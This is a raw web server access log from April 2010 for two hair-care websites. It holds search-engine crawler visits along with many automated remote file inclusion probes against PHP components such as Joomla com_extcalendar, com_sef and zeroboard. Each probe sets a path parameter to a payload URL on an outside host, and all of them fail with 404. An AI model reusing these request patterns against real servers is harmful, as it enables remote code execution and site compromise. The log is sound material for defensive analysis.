77.88.25.28 - - [26/Apr/2010:13:38:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13428 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
110.45.147.246 - - [26/Apr/2010:13:38:30 -0700] "GET /logs/access_100308.log%20%20//main.php?sayfa=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.115.1.7 - - [26/Apr/2010:13:41:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=949 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:13:43:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13228 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:13:44:38 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:13:44:38 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:13:44:38 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:13:47:34 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:13:47:34 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [26/Apr/2010:13:47:34 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:13:49:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13040 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:13:49:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:13:49:48 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:13:49:48 -0700] "GET /skin/zero_vote/error.php?dir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:13:49:51 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:13:51:36 -0700] "GET /logs/access_091130.log%20%20//skin/zero_vote/error.php?dir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.164.215.130 - - [26/Apr/2010:13:52:27 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:13:52:27 -0700] "GET /logs/access_100412.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.164.215.130 - - [26/Apr/2010:13:52:27 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nationalmedecine.com/forum/autoid.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.115.6.16 - - [26/Apr/2010:13:52:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:13:54:37 -0700] "GET /skin/zero_vote/error.php?dir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:13:54:37 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:13:54:37 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:13:56:40 -0700] "GET /logs/access_091130.log%20%20//skin/zero_vote/error.php?dir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:13:57:21 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4804 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:14:04:57 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14036 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
188.72.243.72 - - [26/Apr/2010:14:05:16 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.72.243.72 - - [26/Apr/2010:14:05:16 -0700] "GET /logs/access.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.72.243.72 - - [26/Apr/2010:14:05:16 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:14:06:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13315 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
188.72.243.72 - - [26/Apr/2010:14:13:18 -0700] "GET /logs/access_100405.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:14:14:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15132 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
188.72.243.72 - - [26/Apr/2010:14:14:22 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.72.243.72 - - [26/Apr/2010:14:14:22 -0700] "GET /logs/access.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
188.72.243.72 - - [26/Apr/2010:14:14:22 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.220.174.89 - - [26/Apr/2010:14:21:26 -0700] "GET /logs//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:14:21:26 -0700] "GET /bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:14:21:26 -0700] "GET /logs/access_100301.log%20%20//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:14:21:28 -0700] "GET /bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:14:21:28 -0700] "GET /logs/access_100301.log%20%20//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:14:21:29 -0700] "GET /logs//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:14:21:41 -0700] "GET /logs//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:14:21:41 -0700] "GET /bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:14:21:41 -0700] "GET /logs/access_100301.log%20%20//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:14:22:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7660 HTTP/1.0" 200 333 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
118.220.174.89 - - [26/Apr/2010:14:24:29 -0700] "GET /logs/access_100329.log%20%20//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:14:24:32 -0700] "GET /logs/access_100329.log%20%20//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.220.174.89 - - [26/Apr/2010:14:24:38 -0700] "GET /logs/access_100329.log%20%20//bbs///////////good.php?board_skin_path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:14:34:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13562 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:14:34:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5015 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
110.45.147.246 - - [26/Apr/2010:14:37:18 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:18 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:18 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:19 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:19 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:19 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:19 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:19 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:19 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:20 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:20 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:37:20 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:39:13 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:39:14 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:39:16 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.147.246 - - [26/Apr/2010:14:39:21 -0700] "GET /logs/access_100412.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:14:43:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13333 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:14:50:10 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13410 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:14:52:31 -0700] "GET /logs/send_reminders.php?includedir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:14:52:31 -0700] "GET /send_reminders.php?includedir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:14:52:31 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:14:54:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13480 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:14:55:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13080 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.78.118.123 - - [26/Apr/2010:14:57:08 -0700] "GET /logs/access_100412.log%20%20//components/com_flyspray/startdown.php?file=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [26/Apr/2010:14:57:08 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [26/Apr/2010:14:57:08 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [26/Apr/2010:14:57:37 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [26/Apr/2010:14:57:37 -0700] "GET /logs/access_100412.log%20%20//components/com_flyspray/startdown.php?file=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [26/Apr/2010:14:57:37 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:14:59:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14058 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:02:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8251 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:15:03:53 -0700] "GET /logs/send_reminders.php?includedir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:15:04:01 -0700] "GET /logs/access.log/send_reminders.php?includedir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.208.34.38 - - [26/Apr/2010:15:04:01 -0700] "GET /send_reminders.php?includedir=http://comstar-e.com/images/manuf/jx/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.78.118.123 - - [26/Apr/2010:15:06:53 -0700] "GET /logs/access_100405.log%20%20//components/com_flyspray/startdown.php?file=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [26/Apr/2010:15:07:02 -0700] "GET /logs/access_100405.log%20%20//components/com_flyspray/startdown.php?file=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:15:10:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14689 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
212.117.165.184 - - [26/Apr/2010:15:12:58 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
212.117.165.184 - - [26/Apr/2010:15:12:58 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:14:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13524 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:15:14:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14996 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
66.249.65.236 - - [26/Apr/2010:15:16:40 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:18:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8394 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:22:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14682 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:31:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13111 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
119.235.237.20 - - [26/Apr/2010:15:32:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
119.235.237.20 - - [26/Apr/2010:15:33:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12296 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:37:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12204 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:15:38:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13728 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
119.235.237.86 - - [26/Apr/2010:15:39:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13835 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:43:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13734 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.181.7.33 - - [26/Apr/2010:15:46:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:47:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13685 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:51:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5570 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:55:02 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13983 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:15:55:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13289 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.195.114.22 - - [26/Apr/2010:15:57:06 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.114.22 - - [26/Apr/2010:15:57:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18901 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:15:57:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13331 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
189.78.137.242 - - [26/Apr/2010:15:59:41 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.wtsmith.co.uk/media/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:16:01:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14625 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.50.85.15 - - [26/Apr/2010:16:08:08 -0700] "GET /logs/access_100301.log//bbs//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [26/Apr/2010:16:08:08 -0700] "GET /bbs//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [26/Apr/2010:16:08:08 -0700] "GET /logs//bbs//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [26/Apr/2010:16:09:32 -0700] "GET /logs//bbs//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [26/Apr/2010:16:09:32 -0700] "GET /logs/access_100301.log%20%20//bbs//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
72.46.157.102 - - [26/Apr/2010:16:09:33 -0700] "GET /bbs//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
